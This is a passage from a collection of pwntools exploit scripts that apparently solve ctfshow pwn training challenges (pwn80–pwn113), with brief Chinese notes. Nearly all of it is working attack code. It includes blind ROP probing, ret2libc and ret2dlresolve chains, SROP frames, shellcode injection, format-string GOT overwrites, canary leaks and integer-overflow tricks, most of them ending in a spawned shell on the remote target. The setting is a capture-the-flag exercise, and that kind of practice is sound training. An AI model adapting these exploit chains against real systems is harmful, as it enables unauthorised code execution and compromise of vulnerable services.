payload = b'a' * times + p64(address)
io.send(payload)
data = io.recv()
print(data)
print(hex(address))
io.close()
if data.startswith(b'Welcome to CTFshow-PWN ! Do you know who is daniu?'):
return address
else:
address+=1
except EOFError:
address += 1
def get_csu_gadget(times,stop):
add = 0x4007b0
while 1:
try:
io = connection()
payload = b'a' * times + p64(add) + p64(0) * 6 + p64(stop) + p64(0)
io.send(payload)
data = io.recv(timeout = 0.1)
print(data)
print(hex(add))
io.close()
if b'Welcome to CTFshow-PWN ! Do you know who is daniu?' in data:
io = connection()
payload = b'a' * times + p64(add) + p64(0) * 6 + p64(0)
io.send(payload)
data = io.recv(timeout = 0.1)
if b'Do you know who is daniu?' in data:
add += 1
else:
return add
else:
add += 1
except:
add += 1
def get_puts(times,stop,gadget):
add = 0x400500
pop_rdi = gadget + 9
while 1:
io = connection()
print(hex(add))
payload = b'a' * times + p64(pop_rdi) + p64(0x400000) + p64(add) + p64(stop)
try:
io.send(payload)
data = io.recv(timeout = 0.1)
print(data)
io.close()
if data.startswith(b'\x7fELF'):
return add
else:
add += 1
except:
print('wrong\nwrong\n')
add += 1
def leak(times,stop,gadget,puts_plt):
start = 0x400000
end = 0x401000
add = start
code = b''
judge = "b'\\n'"
with open('pwn', 'wb') as file:
while add < end :
io = connection()
payload = b'a' * times + p64(gadget + 9) + p64(add) +p64(puts_plt) + p64(stop)
io.send(payload)
data = io.recvuntil("Welcome to CTFshow-PWN", timeout=0.1, drop=True)
io.close()
print(hex(add))
print(data)
if data == b'\n':
data = b'\x00'
elif data.endswith(b'\n'):
data = data[:-1]
else:
add += 1
print(data)
file.write(data)
add += len(data)
def attack(times,gadget,stop,puts_plt,puts_got):
poprdi = gadget + 9
io = connection()
payload = b'a' * times + p64(poprdi) + p64(puts_got) + p64(puts_plt) + p64(stop)
io.sendline(payload)
real_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('puts',real_addr)
libc_base = real_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')
payload = b'a' * times + p64(poprdi) + p64(bin_sh) + p64(system_addr) +p64(stop)
io.sendline(payload)
io.interactive()
times = 72
stop_gadget_address = 0x400728
gadget_addr = 0x40083a
puts_pltaddr = 0x400545
puts_gotaddr = 0x602018
#leak(times,stop_gadget_address,gadget_addr,puts_pltaddr)
attack(times,gadget_addr,stop_gadget_address,puts_pltaddr,puts_gotaddr)
#times = get_buf_length()
#address = get_stop_gadget(times)
#address = get_csu_gadget(times,stop_gadget_address)
#address = get_puts(times,stop_gadget_address,gadget_addr)
#print(hex(address))
pwn81
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
elf = ELF('./pwn')
#libc = ELF('./libc.so.6')
io = remote('pwn.challenge.ctf.show',28180)
io.recvuntil(b'O.o\n')
system_addr = int(io.recvline(),16)
libc = LibcSearcher('system',system_addr)
base = system_addr - libc.dump('system')
binsh = base + libc.dump('str_bin_sh')
ret = 0x8aa + base
poprdi = 0x2164f + base
payload = b'a' * 0x88 + p64(poprdi) + p64(binsh) + p64(ret) + p64(system_addr)
io.sendline(payload)
io.interactive()
pwn82
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
elf = ELF('./pwn')
rop = ROP('./pwn')
#libc = ELF('./libc.so.6')
io = remote('pwn.challenge.ctf.show',28137)
offsets = 112
dynstr =elf.get_section_by_name('.dynstr').data()
dynstr = dynstr.replace(b'read',b'system')
rop.raw(b'a' * offsets)
rop.read(0,0x8049804 + 4,4)
rop.read(0,0x80498e0,len(dynstr))
rop.read(0,0x80498e0 + 0x100,len("/bin/sh\x00"))
rop.raw(0x8048376)
rop.raw(0xdeadbeef)
rop.raw(0x80498e0 + 0x100)
rop.raw(b'a' * (256-len(rop.chain())))
io.recvuntil('Welcome to CTFshowPWN!\n')
io.send(rop.chain())
io.send(p32(0x80498e0))
io.send(dynstr)
io.send(b'/bin/sh\x00')
io.interactive()
pwn83
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
context(arch = 'i386',os = 'linux',log_level = 'debug')
#io = process('./pwn')
elf = ELF('./pwn')
rop = ROP('./pwn')
#libc = ELF('./libc.so.6')
io = remote('pwn.challenge.ctf.show',28172)
offsets = 112
dlresolve = Ret2dlresolvePayload(elf,symbol = 'system',args = ['/bin/sh'])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
io.recvuntil('Welcome to CTFshowPWN!\n')
payload = flat({112:raw_rop,256:dlresolve.payload})
io.sendline(payload)
io.interactive()
pwn84
from pwn import *
#from struct import pack
from LibcSearcher import *
#context.log_level = 'debug'
context.arch = 'amd64'
#context(arch = 'amd64',os = 'linux',log_level = 'debug')
#context(arch = 'i386',os = 'linux',log_level = 'debug')
from pwn import *
context.arch="amd64"
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28273)
elf = ELF("./pwn")
bss_addr = elf.bss()
print(hex(bss_addr))
csu_front_addr = 0x400750
csu_end_addr = 0x40076A
leave_ret =0x40063c
poprbp_ret = 0x400588
def csu(rbx, rbp, r12, r13, r14, r15):
# pop rbx, rbp, r12, r13, r14, r15
# rbx = 0
# rbp = 1, enable not to jump
# r12 should be the function that you want to call
# rdi = edi = r13d
# rsi = r14
# rdx = r15
payload = p64(csu_end_addr)
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload += p64(csu_front_addr)
payload += b'a' * 0x38
return payload
io.recvuntil('Welcome to CTFshowPWN!\n')
# stack privot to bss segment, set rsp = new_stack
stack_size = 0x200 # new stack size is 0x200
new_stack = bss_addr+0x100
# modify .dynstr pointer in .dynamic section to a specific location
rop = ROP("./pwn")
offset = 112+8
rop.raw(offset*'a')
rop.raw(csu(0, 1 ,elf.got['read'],0,0x600988+8,8))
rop.raw(0x400607)
rop.raw("a"*(256-len(rop.chain())))
print(rop.dump())
print(len(rop.chain()))
assert(len(rop.chain())<=256)
rop.raw("a"*(256-len(rop.chain())))
io.send(rop.chain())
io.send(p64(0x600B30+0x100))
# construct a fake dynstr section
rop = ROP("./pwn")
rop.raw(offset*'a')
dynstr = elf.get_section_by_name('.dynstr').data()
dynstr = dynstr.replace(b"read",b"system")
rop.raw(csu(0, 1 ,elf.got['read'],0,0x600B30+0x100,len(dynstr)))
rop.raw(0x400607)
rop.raw("a"*(256-len(rop.chain())))
io.send(rop.chain())
io.send(dynstr)
# read /bin/sh\x00
rop = ROP("./pwn")
rop.raw(offset*'a')
rop.raw(csu(0, 1
,elf.got['read'],0,0x600B30+0x100+len(dynstr),len("/bin/sh\x00")))
rop.raw(0x400607)
rop.raw("a"*(256-len(rop.chain())))
io.send(rop.chain())
io.send("/bin/sh\x00")
rop = ROP("./pwn")
rop.raw(offset*'a')
rop.raw(0x0000000000400771) #pop rsi; pop r15; ret;
rop.raw(0)
rop.raw(0)
rop.raw(0x0000000000400773)
rop.raw(0x600B30+0x100+len(dynstr))
rop.raw(0x400516) # the second instruction of read@plt
rop.raw(0xdeadbeef)
rop.raw('a'*(256-len(rop.chain())))
print(rop.dump())
print(len(rop.chain()))
io.send(rop.chain())
io.interactive()
pwn85
from pwn import *
context.arch="amd64"
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28274)
elf = ELF("./pwn")
bss_addr = elf.bss()
csu_front_addr = 0x400780
csu_end_addr = 0x40079A
vuln_addr = 0x400637
def csu(rbx, rbp, r12, r13, r14, r15):
# pop rbx, rbp, r12, r13, r14, r15
# rbx = 0
# rbp = 1, enable not to jump
# r12 should be the function that you want to call
# rdi = edi = r13d
# rsi = r14
# rdx = r15
payload = p64(csu_end_addr)
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload += p64(csu_front_addr)
payload += b'\x00' * 0x38
return payload
def ret2dlresolve_x64(elf, store_addr, func_name, resolve_addr):
plt0 = elf.get_section_by_name('.plt').header.sh_addr
rel_plt = elf.get_section_by_name('.rela.plt').header.sh_addr
relaent = elf.dynamic_value_by_tag("DT_RELAENT") # reloc entry size
dynsym = elf.get_section_by_name('.dynsym').header.sh_addr
syment = elf.dynamic_value_by_tag("DT_SYMENT") # symbol entry size
dynstr = elf.get_section_by_name('.dynstr').header.sh_addr
# construct fake function string
func_string_addr = store_addr
resolve_data = func_name + b"\x00"
# construct fake symbol
symbol_addr = store_addr+len(resolve_data)
offset = symbol_addr - dynsym
pad = syment - offset % syment # align syment size
symbol_addr = symbol_addr+pad
symbol = p32(func_string_addr-dynstr)+p8(0x12)+p8(0)+p16(0)+p64(0)+p64(0)
symbol_index = (symbol_addr - dynsym)//24
resolve_data +=b'\x00'*pad
resolve_data += symbol
# construct fake reloc
reloc_addr = store_addr+len(resolve_data)
offset = reloc_addr - rel_plt
pad = relaent - offset % relaent # align relaent size
reloc_addr +=pad
reloc_index = (reloc_addr-rel_plt)//24
rinfo = (symbol_index<<32) | 7
write_reloc = p64(resolve_addr)+p64(rinfo)+p64(0)
resolve_data +=b'\x00'*pad
resolve_data +=write_reloc
resolve_call = p64(plt0) + p64(reloc_index)
return resolve_data, resolve_call
io.recvuntil('Welcome to CTFshowPWN!\n')
#gdb.attach(io)
store_addr = bss_addr+0x100
sh = b"/bin/sh\x00"
# construct fake string, symbol, reloc.modify .dynstr pointer in .dynamic section to a specific location
rop = ROP("./pwn")
offset = 112+8
rop.raw(offset*'\x00')
resolve_data, resolve_call = ret2dlresolve_x64(elf, store_addr,b"system",elf.got["write"])
rop.raw(csu(0, 1 ,elf.got['read'],0,store_addr,len(resolve_data)+len(sh)))
rop.raw(vuln_addr)
rop.raw("\x00"*(256-len(rop.chain())))
assert(len(rop.chain())<=256)
io.send(rop.chain())
# send resolve data and /bin/sh
io.send(resolve_data+sh)
# rop = ROP("./main_partial_relro_64")
# rop.raw(offset*'\x00')
bin_sh_addr = store_addr+len(resolve_data)
# rop.raw(csu(0, 1 ,elf.got['read'],0,bin_sh_addr,len(sh)))
# rop.raw(vuln_addr)
# rop.raw("a"*(256-len(rop.chain())))
# io.send(rop.chain())
# io.send(sh)
# leak link_map addr
rop = ROP("./pwn")
rop.raw(offset*'\x00')
rop.raw(csu(0, 1 ,elf.got['write'],1,0x601008,8))
rop.raw(vuln_addr)
rop.raw("\x00"*(256-len(rop.chain())))
io.send(rop.chain())
link_map_addr = u64(io.recv(8))
print(hex(link_map_addr))
# set l->l_info[VERSYMIDX(DT_VERSYM)] = NULL
rop = ROP("./pwn")
rop.raw(offset*'\x00')
rop.raw(csu(0, 1 ,elf.got['read'],0,link_map_addr+0x1c8,8))
rop.raw(vuln_addr)
# rop.raw("a"*(256-len(rop.chain())))
io.sendline(rop.chain())
sleep(1)
io.send(p64(0))
rop = ROP("./pwn")
rop.raw(offset*'\x00')
rop.raw(0x00000000004007a3) # 0x00000000004007a3: pop rdi; ret;
rop.raw(bin_sh_addr)
rop.raw(resolve_call)
# rop.raw('\x00'*(256-len(rop.chain())))
io.send(rop.chain())
io.interactive()
pwn86
from pwn import *
context(arch = "amd64",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28195)
elf = ELF("./pwn")
binsh_offset = 0x100
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = elf.symbols['global_buf'] + 0x100
frame.rsi = 0
frame.rdx = 0
frame.rip = elf.symbols['syscall']
payload = bytes(frame).ljust(0x100,b'a') + b'/bin/sh\x00'
io.recvuntil('Welcome to CTFshowPWN!\n')
io.send(payload)
io.interactive()
pwn87
from pwn import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28214)
elf = ELF("./pwn")
jmp_esp = 0x08048d17
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += b"\x0b\xcd\x80"
sub_esp_jmp = asm("sub esp,0x28;jmp esp")
payload = shellcode + b'a' * 15 + p32(jmp_esp) + sub_esp_jmp
io.recvuntil('What\'s your name?')
io.send(payload)
io.interactive()
pwn88
from pwn import *
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28162)
elf = ELF("./pwn")
'''
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
'''
shellcode = asm(shellcraft.sh())
jump_addr = 0x400767
def writebyte(addr,data):
payload = str(hex(addr)) + ' ' + str(data)
io.recvuntil('Where What?')
io.sendline(payload)
writebyte(jump_addr + 1,u32(asm('jmp $-0x4a')[1:].ljust(4,b'\x00')))
writebyte(jump_addr,u32(asm('jmp $-0x4a')[0:1].ljust(4,b'\x00')))
shell_addr = 0x400769
for chr in shellcode:
writebyte(shell_addr,str(chr))
shell_addr += 1
writebyte(jump_addr + 1,u32(asm('jmp $+0x2')[1:].ljust(4,b'\x00')))
io.interactive()
pwn89
from pwn import *
from LibcSearcher import *
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28283)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
bss_addr = 0x602010
rdiret = 0x400be3
rsir15 = 0x400be1
leave = 0x400ada
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_plt = elf.plt['read']
io.recvuntil('You want to send:')
io.sendline(str(0x2000))
payload = b'a' * 0x1010 + p64(bss_addr -0x8) + p64(rdiret) + p64(puts_got) + p64(puts_plt)
payload += p64(rdiret) + p64(0) + p64(rsir15) + p64(bss_addr) + p64(0) + p64(read_plt)
payload += p64(leave)
payload = payload.ljust(0x2000,b'a')
io.send(payload)
io.recvuntil("See you next time!\n")
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
one_gadget = puts_addr - libc.sym['puts'] + 0x10a2fc
io.send(p64(one_gadget))
#io.send(payload)
io.interactive()
pwn90
from pwn import *
from LibcSearcher import *
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28185)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
payload = b'a' * (0x30 - 8 + 1)
io.sendafter('show:',payload)
io.recvuntil('Hello ')
io.recv(0x30 - 8)
canary = u64(io.recv(8).ljust(8,b'\x00')) & (0xffffffffffffff00)
payload = b'a' * 40 + p64(canary) + p64(0) + b'\x42'
io.send(payload)
io.interactive()
格式化字符串
pwn91
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28235)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
daniu = 0x804B038
#payload = b'aaaa' + b'%p ' * 10
payload = fmtstr_payload(7,{daniu:6})
io.send(payload)
io.interactive()
pwn92
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28212)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
io.recvuntil('Enter your format string: ')
io.sendline('%s')
io.interactive()
pwn93
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28136)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
io.sendline('7')
io.interactive()
pwn94
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28109)
elf = ELF("./pwn")
libc = ELF('./libc.so.6')
test = b'aaaa' + b'%p--' * 10
offset = 6
printf_got = elf.got['printf']
system_plt = elf.plt['system']
payload = fmtstr_payload(offset,{printf_got:system_plt})
io.sendline(payload)
io.interactive()
pwn95
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28138)
elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
io.recvuntil(" * ************************************* ")
test = b'aaaa' + b'%p--' * 10
offset = 6
printf_got = elf.got['printf']
payload1 = p32(printf_got) + b'%6$s'
io.send(payload1)
printf_addr = u32(io.recvuntil('\xf7')[-4:])
libc = LibcSearcher('printf',printf_addr)
libc_base = printf_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
payload = fmtstr_payload(offset,{printf_got:system_addr})
io.send(payload)
io.send('/bin/sh')
io.recv()
io.interactive()
pwn96
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28301)
elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
flag=b''
for i in range(6,6+12):
payload='%{}$p'.format(str(i))
io.sendlineafter(b'$ ',payload)
aim = unhex(io.recvuntil(b'\n',drop=True).replace(b'0x',b''))
flag += aim[::-1]
print(flag)
io.close()
io.interactive()
pwn97
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28112)
elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
check_addr = 0x804b040 #needs to be 1
test = b'aaaa' + b'%p ' * 30
offset = 11
io.recvuntil("You can use two command('cat /ctfshow_flag' && 'shutdown')")
payload = fmtstr_payload(offset,{check_addr:1})
io.send(payload)
io.interactive()
pwn98
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28122)
elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
test = b'aaaa' + b'%p ' * 20
offset = 5+10
io.recv()
backdoor = 0x80486CE
payload = "%15$x"
io.sendline(payload)
canary = int(io.recv(),16)
print(canary)
payload = b'a' * (0x34 - 0xc) + p32(canary) + b'a' * 0xc + p32(backdoor)
#payload = fmtstr_payload(offset,{check_addr:1})
io.sendline(payload)
io.interactive()
pwn99
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
context.log_level = 'error'
#elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
test = b'aaaaaaaa' + b'%p ' * 50
offset = 6
def leak(payload):
io = remote('pwn.challenge.ctf.show',28232)
io.recv()
io.sendline(payload)
data = io.recvuntil('\n', drop=True)
if data.startswith(b'0x'):
print(p64(int(data,16)))
io.close()
i = 1
while 1:
payload = '%{}$p'.format(i)
leak(payload)
i += 1
#payload = fmtstr_payload(offset,{check_addr:1})
io.interactive()
pwn100
解析:
程序前面对于时间的记录没有漏洞点,主要在于格式化字符串。
(1)如何重复利用格式化字符串漏洞
fmt_attack函数对于自身被调用次数存在校验,但只需每次调用printf时先找到a1的存储位置,并通过偏移修改a1的值为0,即%7$n。
(2)都泄露了什么东西
首次的%16$p泄露的是main的rbp地址,第二次泄露的是fmt_attack函数的返回地址。
之所以将main函数的rbp值要减去0x28是因为main函数自身栈空间大小为0x20,再加上8个字节。(返回地址大小8个字节)的偏移(被调函数【此处可特指fmt_attack】的返回地址的存储地址,即修改该地址的数据就是在修改被调用函数的返回地址)
(3)如何利用
%n覆盖的是指定偏移位置里面的值所指向的地址里面的值,故第三次调用fmt_attack直接替换返回地址的低2字节为getflag内容校验后的部分。
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('pwn.challenge.ctf.show',28210)
def fmt(payload):
io.recvuntil(">>")
io.sendline('2')
io.sendline(payload)
io.sendline('00 00 00')
fmt('%7$n-%16$p')
io.recvuntil('-')
ret_addr = int(io.recvuntil('\n')[:-1],16)-0x28
payload = '%7$n+%17$p'
fmt(payload)
io.recvuntil('+')
ret_value = int(io.recvuntil('\n')[:-1],16)
elf_base = ret_value - 0x102c
payload1 = b'%'+str((elf_base+0xf56)&0xffff).encode()+b'c%10$hn'
payload1 = payload1.ljust(0x10,b'a')
payload1 += p64(ret_addr)
fmt(payload1)
log.success("ret_value: "+hex(ret_value))
log.success("ret_addr: "+hex(ret_addr))
io.interactive()
整数安全
pwn101
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
context.log_level = 'error'
#elf = ELF("./pwn")
#libc = ELF('./libc.so.6')
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
io = remote("pwn.challenge.ctf.show", 28236)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("Enter two integers: ")
a = 0x80000000
b = 0x7FFFFFFF
print(a)
print(b)
payload = str(a) + ' ' + str(b)
io.sendline(payload)
io.interactive()
pwn102
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28275)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("Enter an unsigned integer: ")
a = -1
unsigned_a = c_uint(a).value
print(unsigned_a)
payload = str(unsigned_a)
io.sendline(payload)
io.interactive()
pwn103
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28237)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("Enter the length of data (up to 80): ")
a = 0
b = -1
payload = str(a)
io.sendline(payload)
payload = str(b)
io.sendline(payload)
io.interactive()
pwn104
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28260)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("How long are you?")
io.sendline('30')
that = 0x40078D
payload = b'a' * 22 + p64(that)
io.recvuntil("Who are you?")
io.sendline(payload)
io.interactive()
pwn105
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28251)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
success = 0x804870E
length = 260
payload = b'a' * (0x11+4) + p32(success)
payload = payload.ljust(length,b'a')
io.recvuntil("[+] Check your permissions:")
io.sendline(payload)
io.interactive()
pwn106
from pwn import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28161)
elf = ELF("./pwn")
flag = 0x8048919
io.recvuntil("Your choice:")
io.sendline('1')
io.recvuntil("Please input your username:")
io.sendline('name')
io.recvuntil("Please input your passwd:")
payload = b'a' * 0x18 + p32(flag)
payload = payload.ljust(260,b'a')
io.sendline(payload)
io.interactive()
pwn107
from pwn import *
from LibcSearcher import *
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
#io = process("./pwn")
io = remote('pwn.challenge.ctf.show',28268)
elf = ELF("./pwn")
#libc = ELF("./libc.so.6")
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
io.recvuntil("read?")
io.sendline('-1')
io.recvuntil("\n")
payload = b'a' * (0x2c + 4) + p32(printf_plt) + p32(main_addr) + p32 (printf_got)
io.sendline(payload)
io.recvuntil('\n')
real_addr = u32(io.recv(4))
libc = LibcSearcher('printf',real_addr)
libc_base = real_addr - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump("str_bin_sh")
io.recvuntil("read?")
io.sendline('-1')
io.recvuntil("\n")
payload = b'a' * (0x2c + 4) + p32(system_addr) + p32(main_addr) + p32 (binsh)
io.sendline(payload)
io.interactive()
pwn108
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28163)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil('0x')
#puts_addr = int(io.recvuntil('\n',drop = True),16)
puts_addr = int(io.recv(12),16)
libc_base = puts_addr - libc.sym['puts']
one_gadget = libc_base + 0xe54fe
strlen_addr = libc_base + libc.got['strlen']
print(hex(libc.sym['strlen']))
io.recvuntil("shoot!shoot!")
io.sendline(str(strlen_addr))
for i in range(3):
io.recvuntil("biang!")
payload = chr(one_gadget & 0xFF)
io.sendline(payload)
one_gadget = one_gadget >> 8
io.interactive()
pwn109
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28153)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recvuntil("What you want to do?\n1) Input someing!\n2) Hang out!!\n3) Quit!!!")
io.sendline('1')
io.recvuntil('\n')
buf_addr = io.recvuntil('\n',drop = True)
buf_addr = b'0x' + buf_addr
buf_addr = int(buf_addr,16)
print(buf_addr)
ret_addr = buf_addr + 0x41c
payload = fmtstr_payload(16,{ret_addr:buf_addr})
io.sendline(payload)
io.recvuntil("What you want to do?\n1) Input someing!\n2) Hang out!!\n3) Quit!!!")
io.sendline('2')
io.recvuntil("What you want to do?\n1) Input someing!\n2) Hang out!!\n3) Quit!!!")
io.sendline('1')
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.recvuntil("What you want to do?\n1) Input someing!\n2) Hang out!!\n3) Quit!!!")
io.sendline('3')
io.interactive()
pwn110
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28258)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
io.recv()
io.sendline('-1')
buf_addr = io.recv(8)
buf_addr = int(buf_addr,16)
print(buf_addr)
io.recvuntil('\n')
shellcode = asm(shellcraft.sh())
payload = shellcode
payload = payload.ljust(0x41b+4,b'a') + p32(buf_addr)
io.sendline(payload)
io.interactive()
Bypass安全机制
pwn111
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
context(arch = "amd64",os = 'linux',log_level = 'debug')
#context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28187)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
backdoor = 0x400697
offset = 0x80 + 8
payload = b'a' * offset + p64(backdoor)
io.sendline(payload)
io.interactive()
pwn112
from pwn import *
from LibcSearcher import *
from ctypes import c_uint
#context(arch = "amd64",os = 'linux',log_level = 'debug')
context(arch = "i386",os = 'linux',log_level = 'debug')
io = remote("pwn.challenge.ctf.show", 28224)
#io = process(pwn)
elf = ELF('./pwn')
libc = ELF("./libc.so.6")
payload = p32(17) *14
io.sendline(payload)
io.interactive()
pwn113
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
io = remote("pwn.challenge.ctf.show",28199)
# io = process('./pwn')
elf = ELF('./pwn')
#libc = ELF("./libc.so.6")
ret = 0x400640
pop_rdi_ret = 0x401ba3
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_ret = elf.sym['main']
data = 0x603000
io.recvuntil(b">> ")
payload = b"A"*0x418 + p8(0x28) + p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main_ret)
io.sendline(payload)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr-libc.dump('puts')
mprotect_addr = libc_base+libc.dump("mprotect")
pop_rdx = libc_base+0x1b96
pop_rsi = libc_base+0x23e6a
gets_addr = libc_base+libc.dump("gets")
print("libc_base:",hex(libc_base))
io.recvuntil(b">> ")
payload = b"A"*0x418+p8(0x28)+p64(pop_rdi_ret)+ p64(data)
payload += p64(gets_addr)+p64(pop_rdi_ret)+p64(data)
